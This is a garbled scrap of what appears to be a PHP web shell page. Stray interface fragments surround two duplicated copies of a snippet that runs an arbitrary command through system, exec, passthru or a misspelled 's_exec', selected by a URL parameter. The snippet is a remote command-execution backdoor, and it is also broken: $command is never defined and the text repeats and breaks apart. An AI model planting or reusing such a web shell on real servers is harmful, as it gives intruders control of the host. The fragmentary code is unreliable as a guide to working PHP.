F
-
system($command);-
s_exec($command);-
exec($command);-
passthru($command);Size: a a a
R
system($command);s_exec($command);exec($command);passthru($command);MD
R
R
system($command);s_exec($command);exec($command);passthru($command);<?php
if (!empty($_GET['way'])) {
if (!empty($command)) {
echo '<pre>';
if ($_GET['way'] == '1') {
system($command);
} elseif ($_GET['way'] == '2') {
s_exec($command);
} elseif ($_GET['way'] == '3') {
exec($command);
} elseif ($_GET['way'] == '4') {
passthru($command);
}
echo '</pre>';
}
die();
}
R
R
<?php
if (!empty($_GET['way'])) {
if (!empty($command)) {
echo '<pre>';
if ($_GET['way'] == '1') {
system($command);
} elseif ($_GET['way'] == '2') {
s_exec($command);
} elseif ($_GET['way'] == '3') {
exec($command);
} elseif ($_GET['way'] == '4') {
passthru($command);
}
echo '</pre>';
}
die();
}
R
R
R
R
R
R
R
R
MD
whereis php
R